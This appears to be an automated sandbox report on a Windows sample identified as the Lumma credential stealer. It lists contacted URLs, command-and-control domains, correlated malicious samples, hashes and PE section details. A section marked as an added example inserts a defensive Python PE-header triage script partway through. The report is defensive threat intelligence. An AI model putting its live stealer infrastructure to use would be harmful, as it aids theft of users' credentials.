                                                                                                                                                                                              https://help.steampowered.com/en/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://steamcommunity.com/market/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/news/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=e0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://checkout.steampowvc0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579668
Start date and time: 2024-12-23 07:17:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0gnHF2twcT.exe (renamed because the original name is a hash value)
Original Sample Name: 85bfde4071d80bb2bdffb80f68d54d17.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 0gnHF2twcT.exe, PID 1464 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:18:39 | API Interceptor | 16x Sleep call for process: 0gnHF2twcT.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.66.86 | MV ROCKET_PDA.exe | Get hash | malicious | FormBook | Browse
  • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
23.55.153.106 | 20yLTIU4mS.exe | Get hash | malicious | LummaC, Stealc | Browse
 | ieD6yf6yc6.exe | Get hash | malicious | LummaC | Browse
 | Qsqi9KQXgy.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
 | tPSrcPbmRe.exe | Get hash | malicious | LummaC | Browse
 | NQbg5Ht2hW.exe | Get hash | malicious | LummaC | Browse
 | BZuk2UI1RC.exe | Get hash | malicious | LummaC | Browse
 | uLkHEqZ3u3.exe | Get hash | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | Browse
 | hAmnMk8afk.exe | Get hash | malicious | LummaC | Browse
 | EI3TafelpV.exe | Get hash | malicious | LummaC | Browse
 | 6S7hoBEHvr.exe | Get hash | malicious | LummaC | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
lev-tolstoi.com | 20yLTIU4mS.exe | Get hash | malicious | LummaC, Stealc | Browse
  • 104.21.66.86
 | Qsqi9KQXgy.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
  • 104.21.66.86
 | tPSrcPbmRe.exe | Get hash | malicious | LummaC | Browse
  • 104.21.66.86
 | NQbg5Ht2hW.exe | Get hash | malicious | LummaC | Browse
  • 172.67.157.254
 | BZuk2UI1RC.exe | Get hash | malicious | LummaC | Browse
  • 172.67.157.254
 | uLkHEqZ3u3.exe | Get hash | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | Browse
  • 104.21.66.86
 | EI3TafelpV.exe | Get hash | malicious | LummaC | Browse
  • 172.67.157.254
 | 6S7hoBEHvr.exe | Get hash | malicious | LummaC | Browse
  • 172.67.157.254
 | uZO96rXyWt.exe | Get hash | malicious | LummaC | Browse
                                                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                                                  steamcommunity.com20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  ieD6yf6yc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  tPSrcPbmRe.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                                  6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | 20yLTIU4mS.exe | malicious | LummaC, Stealc | 23.55.153.106
AKAMAI-ASN1EU | ieD6yf6yc6.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | Qsqi9KQXgy.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 23.55.153.106
AKAMAI-ASN1EU | tPSrcPbmRe.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | NQbg5Ht2hW.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | BZuk2UI1RC.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 23.55.153.106
AKAMAI-ASN1EU | gVKsiQIHqe.exe | malicious | Vidar | 23.44.201.28
AKAMAI-ASN1EU | hAmnMk8afk.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | EI3TafelpV.exe | malicious | LummaC | 23.55.153.106
CLOUDFLARENETUS | 20yLTIU4mS.exe | malicious | LummaC, Stealc | 104.21.66.86
CLOUDFLARENETUS | Qsqi9KQXgy.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.66.86
CLOUDFLARENETUS | tPSrcPbmRe.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | NQbg5Ht2hW.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | BZuk2UI1RC.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86
CLOUDFLARENETUS | gVKsiQIHqe.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | EI3TafelpV.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | 6S7hoBEHvr.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | DHL AWB-documents.lnk | malicious | Divulge Stealer | 162.159.138.232
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 20yLTIU4mS.exe | malicious | LummaC, Stealc | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | ieD6yf6yc6.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | Qsqi9KQXgy.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | tPSrcPbmRe.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | NQbg5Ht2hW.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | BZuk2UI1RC.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | hAmnMk8afk.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | EI3TafelpV.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | 6S7hoBEHvr.exe | malicious | LummaC | 104.21.66.86, 23.55.153.106
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948559011534622
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 0gnHF2twcT.exe
File size: 1'881'600 bytes
MD5: 85bfde4071d80bb2bdffb80f68d54d17
SHA1: d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
SHA256: 945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
SHA512: c6ba3ee29d6e21bed1933834382bcfd1ef1abb65a1010b64667df9533fc34fbd7d6c39f850710b0ef9148273edd78255a9b846f57df73322e4fe5b28684b7bcc
                                                                                                                                                                                                                                                                  SSDEEP:24576:WQUGZj5xWj64kWhxEN580NxJxiRkzvjzk4uln6T1kPvsGhc+S0kxSQ3K4/v/DL3R:sGZlxW9ED1xiRL4hmfQJJHHnNmw
                                                                                                                                                                                                                                                                  TLSH:889533061E909531D31B4B73D8ABB3442F987E7D91DBA50FB87D342F44E3312839AA56
                                                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@J...........@..........................pJ...........@.................................T0..h..
                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                  Entrypoint:0x8a4000
                                                                                                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
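The static header fields above can be reproduced and sanity-checked without a sandbox. The following is an added example, not Joe Sandbox output or code: a stdlib-only Python PE32 header parser that computes 8-bit entropy, decodes the COFF timestamp and the characteristics bit fields, resolves which section owns the entry point and flags the two header conditions the detection list at the top of this report names (an entry point outside a standard code section and a section name containing special characters). The PE image it analyses is constructed inline; its section names, addresses and payload bytes are assumptions and are not taken from the sample. Only the timestamp value 0x675F3CD1 is reused from the report, as a known answer for the decoder.

```python
"""Stdlib-only PE32 header triage reproducing the Static File Info fields above (added example)."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

FILE_CHARS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF",
             0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
STANDARD_CODE_SECTIONS = {".text", "CODE", ".textbss", "INIT"}   # where linkers normally put code

def shannon_entropy(data):
    """8-bit Shannon entropy in bits/byte (0-8); 7.9+ is typical of packed or encrypted data."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]

def parse_pe(data):
    """DOS header -> NT headers -> section table of a PE32 image, with per-section entropy."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                # IMAGE_OPTIONAL_HEADER32 follows the COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) handled here")
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):                          # 40-byte IMAGE_SECTION_HEADERs after the optional header
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": max(vsize, rawsize), "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"timestamp_raw": ts, "characteristics": chars, "dll_characteristics": dll_chars,
            "entry_rva": entry_rva, "image_base": image_base, "subsystem": subsystem, "sections": sections}

def entrypoint_section(info):
    for s in info["sections"]:
        if s["vaddr"] <= info["entry_rva"] < s["vaddr"] + s["vsize"]:
            return s["name"]
    return None                                    # entry point maps to no section at all

def triage(data):
    """Report-style fields plus the findings a reviewer should notice."""
    info = parse_pe(data)
    ep_sec = entrypoint_section(info)
    odd = [s["name"] for s in info["sections"] if not all(c.isalnum() or c in "._$" for c in s["name"])]
    findings = []
    if ep_sec is None:
        findings.append("entry point lies outside every section")
    elif ep_sec not in STANDARD_CODE_SECTIONS:
        findings.append("entry point in non-standard section %r" % ep_sec)
    if odd:
        findings.append("section name(s) with special chars: %r" % odd)
    if shannon_entropy(data) > 7.5:
        findings.append("high file entropy, packed or encrypted payload likely")
    stamp = datetime.fromtimestamp(info["timestamp_raw"], tz=timezone.utc)
    return {"entrypoint": "0x%x" % (info["image_base"] + info["entry_rva"]), "entrypoint_section": ep_sec,
            "timestamp": stamp.strftime("%Y-%m-%d %H:%M:%S UTC"),
            "file_characteristics": flag_names(info["characteristics"], FILE_CHARS),
            "dll_characteristics": flag_names(info["dll_characteristics"], DLL_CHARS),
            "subsystem": SUBSYSTEMS.get(info["subsystem"], "unknown(%d)" % info["subsystem"]),
            "file_entropy": round(shannon_entropy(data), 3), "sections": info["sections"],
            "odd_section_names": odd, "findings": findings}

def build_demo_pe():
    """Constructed PE32 (not the sample; not a runnable program) with the header shapes the report
    flags. Only the timestamp 0x675F3CD1 is taken from the report, as a known answer for the decoder."""
    file_align, headers_size = 0x200, 0x400
    sections = [(b".text", 0x1000, b"\xC3" * 0x100),             # 'ret' padding, entropy 1.0 after zero-fill
                (b"\x01\x02\x03.pad", 0x2000, b"\x00" * 0x100),  # non-printable bytes in the name
                (b".taggant", 0x3000, bytes(range(256)) * 2)]    # every byte value twice: entropy exactly 8.0
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                         # e_lfanew: NT headers right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x675F3CD1, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3000)                       # AddressOfEntryPoint -> inside .taggant
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x4000, headers_size)        # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 2, 0x8040)                   # GUI subsystem; DYNAMIC_BASE | TERMINAL_SERVER_AWARE
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    sec_hdrs, body, raw_ptr = bytearray(), bytearray(), headers_size
    for name, vaddr, raw in sections:
        raw_size = -(-len(raw) // file_align) * file_align       # round up to FileAlignment
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return bytes((dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(headers_size, b"\0") + body)

if __name__ == "__main__":
    for key, value in triage(build_demo_pe()).items():
        print("%-20s %s" % (key, value))
```

Run against a real file with `triage(open(path, "rb").read())`. The entry-point check is the one that matters for this sample: the report puts the entry point in a section named `.taggant` rather than `.text`, which is the condition the non-standard-section finding above reports. The instruction listing that follows is a linear disassembly starting at that entry point; after the first `jmp` the bytes are almost all 00 00, which decodes as `add byte ptr [eax], al`, so what is shown there is padding or data rather than the code the jump lands on.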
Instruction
jmp 00007F0548CE2EAAh
sete byte ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0548CE4EA5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [ecx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec ebp
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x51000 | 0x24800 | 6707eae06ad8ef695694477125f4da28 | False | 0.9973980629280822 | data | 7.980219456440776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x54000 | 0x2ab000 | 0x200 | e5b95ff924726a140bc506883f50bc2a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mimqpfga | 0x2ff000 | 0x1a4000 | 0x1a3200 | 4b75770d3c73a3ebf338defa94ed8d23 | False | 0.9946124506039368 | data | 7.95348924063239 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
grnkiruz | 0x4a3000 | 0x1000 | 0x400 | b8557a71f048899a7fb693785871f879 | False | 0.7744140625 | data | 5.998764758216804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a4000 | 0x3000 | 0x2200 | aea16088865b0798c279dd12307af37d | False | 0.0861672794117647 | DOS executable (COM) | 0.933109508865922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:18:39.971144+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.8 | 56152 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.115629+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.8 | 59276 | 1.1.1.1 | 53 | UDP
